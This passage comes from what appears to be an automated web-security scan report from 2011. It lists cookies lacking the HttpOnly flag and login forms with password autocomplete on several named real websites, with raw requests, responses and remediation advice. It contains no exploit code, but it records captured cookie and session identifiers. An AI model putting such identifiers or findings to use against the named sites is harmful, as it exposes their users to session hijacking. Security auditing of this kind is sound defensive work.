  • zm=AQABAAAA8wcAABTXMn3ZESMf_AapOt_c2LHphBNXMA5JPfT6gZUI8wuNU5G32qzfW8UK7aCUTmf44ZhwGkV-w3TWOo4zf3L1feOR19CmSKUwC-KzmxCF9Gui0H3lxIuicTJIjx3R9nwAzZSnJmkR; domain=.zazzle.com; path=/
  • zs=255EC80F-9BB5-440C-9150-9CB65A7DE4C8%7c0%7c12940404058%7c; domain=.zazzle.com; expires=Tue, 01-Jan-2036 08:00:00 GMT; path=/
  • us=98B57018-41A2-4493-8838-36A22CB611B1; domain=.zazzle.com; expires=Tue, 01-Jan-2036 08:00:00 GMT; path=/
  • s=5246001291012673539; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /netlingo HTTP/1.1
Host: www.zazzle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 178097
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="CAO DSP COR CUR ADMa DEVa OUR BUS UNI PRE"
Set-Cookie: BLITZEN-2600=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2602=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2604=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2606=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2608=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2610=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2612=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2614=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2616=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2618=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2620=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2622=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2700=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2702=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2704=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2706=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2708=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2710=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2712=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2714=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2716=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2718=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2720=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2722=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2800=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2802=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2804=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2806=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2808=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2810=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2812=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2814=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2816=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2818=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2820=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2822=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2900=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2902=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2904=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2906=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2908=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2910=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2912=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2914=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2916=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2918=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2920=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2922=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3000=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3002=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3004=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3006=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3008=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3010=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3012=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3014=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3016=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3018=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3020=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3022=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: zshopurl=z%2fnetlingo; path=/
Set-Cookie: pis=1; path=/;
Set-Cookie: zm=AQABAAAA8wcAABTXMn3ZESMf_AapOt_c2LHphBNXMA5JPfT6gZUI8wuNU5G32qzfW8UK7aCUTmf44ZhwGkV-w3TWOo4zf3L1feOR19CmSKUwC-KzmxCF9Gui0H3lxIuicTJIjx3R9nwAzZSnJmkR; domain=.zazzle.com; path=/
Set-Cookie: zs=255EC80F-9BB5-440C-9150-9CB65A7DE4C8%7c0%7c12940404058%7c; domain=.zazzle.com; expires=Tue, 01-Jan-2036 08:00:00 GMT; path=/
Set-Cookie: us=98B57018-41A2-4493-8838-36A22CB611B1; domain=.zazzle.com; expires=Tue, 01-Jan-2036 08:00:00 GMT; path=/
Set-Cookie: general%5Fmaturity=1; domain=.zazzle.com; path=/
Set-Cookie: s=5246001291012673539; path=/
Date: Tue, 25 Jan 2011 04:40:58 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><link rel="stylesheet" type="text/css" href="http://www.zazzle.co
...[SNIP]...

14.938. http://www1.whdh.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • WHDHSTR=b67ab8cd4dbb526d8d29bbf7eb21f1ca; expires=Wed, 25-Jan-2012 21:54:00 GMT; path=/; domain=.whdh.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www1.whdh.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:08 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Set-Cookie: WHDHSTR=b67ab8cd4dbb526d8d29bbf7eb21f1ca; expires=Wed, 25-Jan-2012 21:54:00 GMT; path=/; domain=.whdh.com
Age: 0
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
X-doRedirect: false;
X-Version: 1.0;
Expires: Mon, 24 Jan 2011 21:55:08 GMT
Cache-Control: private, max-age=300
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 60121
Via: 1.1 dfw107022 (MII-APC/1.6)

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH 7NEWS NBC Boston/Regional News, Weather, Traffic, Sports, Entertainment Coverage
...[SNIP]...

14.939. http://xads.zedo.com/ads3/a

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xads.zedo.com
Path:   /ads3/a

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • FFgeo=5386156; path=/; EXPIRES=Wed, 25-Jan-12 00:11:14 GMT; DOMAIN=.zedo.com
  • ZEDOIDA=jgHX0goAACQAAH@dLJYAAAKY~012511; path=/; expires=Fri, 22-Jan-21 00:11:14 GMT; domain=.zedo.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ads3/a HTTP/1.1
Host: xads.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:14 GMT
Server: ZEDO 3G
Set-Cookie: FFgeo=5386156; path=/; EXPIRES=Wed, 25-Jan-12 00:11:14 GMT; DOMAIN=.zedo.com
Set-Cookie: ZEDOIDA=jgHX0goAACQAAH@dLJYAAAKY~012511; path=/; expires=Fri, 22-Jan-21 00:11:14 GMT; domain=.zedo.com
Expires: -1
Pragma: no-cache
Cache-Control: no-cache
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Length: 266
Connection: close
Content-Type: text/html

<HTML><HEAD></HEAD><BODY><a href='http://c1.zedo.com/ads3/c?a=0;x=0;g=172,0;c=0,0;i=19;n=0;w=47;m=82;s=0;z=42306355;k=http://www.zedo.com'TARGET='_blank'><img src='http://c1.zedo.com/OzoDB/0/0/0/blank
...[SNIP]...

14.940. http://xfactor.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xfactor.tweetmeme.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • tm_identity=a4d8db2993601638d04abd7579c4807a; expires=Tue, 01-Feb-2011 04:40:45 GMT; path=/; domain=.tweetmeme.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: xfactor.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 04:40:45 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=a4d8db2993601638d04abd7579c4807a; expires=Tue, 01-Feb-2011 04:40:45 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0037000179290771
X-Served-In: 0.97312808036804
X-Served-By: h03
Content-Length: 42682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...

14.941. http://yoga.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://yoga.tweetmeme.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • tm_identity=dc2ca952c1c37e52f76eb77141d10a94; expires=Tue, 01-Feb-2011 04:40:54 GMT; path=/; domain=.tweetmeme.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: yoga.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 04:40:54 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=dc2ca952c1c37e52f76eb77141d10a94; expires=Tue, 01-Feb-2011 04:40:54 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.004396915435791
X-Served-In: 0.036845922470093
X-Served-By: ded2059
Content-Length: 40246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...

14.942. http://youtube.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://youtube.tweetmeme.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • tm_identity=94b6566617ce940cd794bf1274e16135; expires=Tue, 01-Feb-2011 04:41:00 GMT; path=/; domain=.tweetmeme.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: youtube.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 04:41:00 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=94b6566617ce940cd794bf1274e16135; expires=Tue, 01-Feb-2011 04:41:00 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0044999122619629
X-Served-In: 0.045840978622437
X-Served-By: h01
Content-Length: 40368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...

15. Password field with autocomplete enabled
There are 346 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


15.1. https://acc.newsguy.com/cgi-bin/login_frm

Summary

Severity:   Low
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /cgi-bin/login_frm

Issue detail

The page contains a form with the following action URL:
  • https://acc.newsguy.com/cgi-bin/login_prx
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /cgi-bin/login_frm HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=BGcaQVM6SsMq0HMk6SquKem4opp0oWW0L4d3d923f;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 14:52:59 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Connection: close
Content-Type: text/html

<html>

<head>
<title>Newsguy - Login to Newsguy</title>
<meta NAME="description" CONTENT="Access to Usenet Newsgroups, Email accounts, Web space,
Software, Archives, Art & Music Galleries, Feature co
...[SNIP]...
<!--webbot BOT="GeneratedScript" endspan --><form method="POST" name="FrontPage_Form1" action="/cgi-bin/login_prx" onsubmit="return FrontPage_Form1_Validator(this)">
<div align="center">
...[SNIP]...
<!--webbot bot="Validation" b-value-required="TRUE" --><input type="password" size="12" name="pass"></font>
...[SNIP]...

15.2. https://acc.newsguy.com/user/accnt_settings

Summary

Severity:   Low
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/accnt_settings

Issue detail

The page contains a form with the following action URL:
  • https://acc.newsguy.com/user/accnt_edit_usenet?1+86945
The form contains the following password fields with autocomplete enabled:
  • pass1
  • pass2

Request

GET /user/accnt_settings HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:37 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: DIGEST=C378.xjGh8DpywVURU2nsemaopp0oWW0L4d3d9451; path=/; domain=.newsguy.com;
Connection: close
Content-Type: text/html

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Account Settings</TITLE>
<script src="/accnt_forms.js"></script>
<script language="JavaScript">
<!-- calculate available quotas by values type in
...[SNIP]...
<tr>
<form action="accnt_edit_usenet?1+86945" method=post>
<td bgcolor="#5273A5" width="525" height="18">
...[SNIP]...
<td width="133" height="25">
<input type="password" name="pass1" size="10"></td>
...[SNIP]...
<td width="140" height="25">
<input type="password" name="pass2" size="10"></td>
...[SNIP]...

15.3. https://billing.cloudaccess.net/cart.php

Summary

Severity:   Low
Confidence:   Certain
Host:   https://billing.cloudaccess.net
Path:   /cart.php

Issue detail

The page contains a form with the following action URL:
  • https://billing.cloudaccess.net/dologin.php
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /cart.php?a=add&pid=41 HTTP/1.1
Host: billing.cloudaccess.net
Connection: keep-alive
Referer: http://www.cloudaccess.net/pricing.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.4.10.1295877160

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:56:09 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=nlahukcb6v56uitl53v0m81g20; expires=Sat, 05-Mar-2011 13:56:09 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9086


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
<div class="inModule">
    <form method="post" action="dologin.php" id="loginSideModule">
    <h3 class="header">
...[SNIP]...
</label>
    <input name="password" type="password" size="25" id="passwordLogin" />
       
       <p>
...[SNIP]...

15.4. https://billing.cloudaccess.net/clientarea.php

Summary

Severity:   Low
Confidence:   Certain
Host:   https://billing.cloudaccess.net
Path:   /clientarea.php

Issue detail

The page contains a form with the following action URL:
  • https://billing.cloudaccess.net/dologin.php
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /clientarea.php HTTP/1.1
Host: billing.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=nlahukcb6v56uitl53v0m81g20; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.4.10.1295877160;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:57:12 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 5693
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
<div class="inModule">
    <form method="post" action="dologin.php" id="loginSideModule">
    <h3 class="header">
...[SNIP]...
</label>
    <input name="password" type="password" size="25" id="passwordLogin" />
       
       <p>
...[SNIP]...

15.5. https://billing.cloudaccess.net/clientarea.php

Summary

Severity:   Low
Confidence:   Certain
Host:   https://billing.cloudaccess.net
Path:   /clientarea.php

Issue detail

The page contains a form with the following action URL:
  • https://billing.cloudaccess.net/jwhmcs.php?goto=clientarea&task=ulogin
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /clientarea.php HTTP/1.1
Host: billing.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=nlahukcb6v56uitl53v0m81g20; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.4.10.1295877160;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:57:12 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 5693
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
</p>
<form action="jwhmcs.php?goto=clientarea&task=ulogin" method="post" name="frmlogin" id="frmlogin">
<table style="margin: 0 auto;" cellpadding="0" cellspacing="0" border="0" align="center" class="frame">
...[SNIP]...
<td><input type="password" name="password" size="25" value="" /></td>
...[SNIP]...

15.6. https://billing.cloudaccess.net/domainchecker.php

Summary

Severity:   Low
Confidence:   Certain
Host:   https://billing.cloudaccess.net
Path:   /domainchecker.php

Issue detail

The page contains a form with the following action URL:
  • https://billing.cloudaccess.net/dologin.php
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /domainchecker.php HTTP/1.1
Host: billing.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=nlahukcb6v56uitl53v0m81g20; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.4.10.1295877160;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:57:12 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8492


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
<div class="inModule">
    <form method="post" action="dologin.php" id="loginSideModule">
    <h3 class="header">
...[SNIP]...
</label>
    <input name="password" type="password" size="25" id="passwordLogin" />
       
       <p>
...[SNIP]...

15.7. https://billing.cloudaccess.net/knowledgebase.php

Summary

Severity:   Low
Confidence:   Certain
Host:   https://billing.cloudaccess.net
Path:   /knowledgebase.php

Issue detail

The page contains a form with the following action URL:
  • https://billing.cloudaccess.net/dologin.php
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /knowledgebase.php HTTP/1.1
Host: billing.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=nlahukcb6v56uitl53v0m81g20; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.4.10.1295877160;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:56:23 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9061


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
<div class="inModule">
    <form method="post" action="dologin.php" id="loginSideModule">
    <h3 class="header">
...[SNIP]...
</label>
    <input name="password" type="password" size="25" id="passwordLogin" />
       
       <p>
...[SNIP]...

15.8. https://billing.cloudaccess.net/knowledgebase/10/Managing-your-account

Summary

Severity:   Low
Confidence:   Certain
Host:   https://billing.cloudaccess.net
Path:   /knowledgebase/10/Managing-your-account

Issue detail

The page contains a form with the following action URL:
  • https://billing.cloudaccess.net/knowledgebase/10/dologin.php
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /knowledgebase/10/Managing-your-account HTTP/1.1
Host: billing.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=nlahukcb6v56uitl53v0m81g20; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.4.10.1295877160;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:56:26 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 7344
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
<div class="inModule">
